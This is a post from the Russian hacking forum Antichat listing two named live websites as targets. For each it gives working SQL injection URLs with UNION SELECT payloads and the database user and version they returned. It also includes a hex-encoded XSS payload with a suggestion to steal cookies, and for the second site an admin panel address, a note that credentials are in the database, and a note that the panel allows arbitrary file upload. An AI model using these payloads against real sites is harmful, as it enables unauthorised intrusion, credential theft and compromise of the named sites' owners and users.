Форум АНТИЧАТ - Показать сообщение отдельно

1. Target: courtnews.co.nz PR 3

Type: SQLi

Код:

http://courtnews.co.nz/story.php?id=-3251+UNION+SELECT+user%28%29,version%28%29,3+--

hooked_hooked@localhost

5.1.73-cll

На сайте есть блог wp, можно попробовать украсть куки через XSS

Код:

http://courtnews.co.nz/story.php?id=-3251+UNION+SELECT+1,0x3C7363726970743E616C657274282758585827293C2F7363726970743E,3+--

2. Target:beloboka.ru ТИЦ 60

Type: SQLi

Код:

http://beloboka.ru/beloboka/index.php?mode=sections&id=-53+UNION+SELECT+1,2,3,4,user(),version()+--

beloboka@localhost

5.6.19-log

Админка http://beloboka.ru/beloboka/cp

Пароль и логин в базе. В админке есть возможность залить любой файл.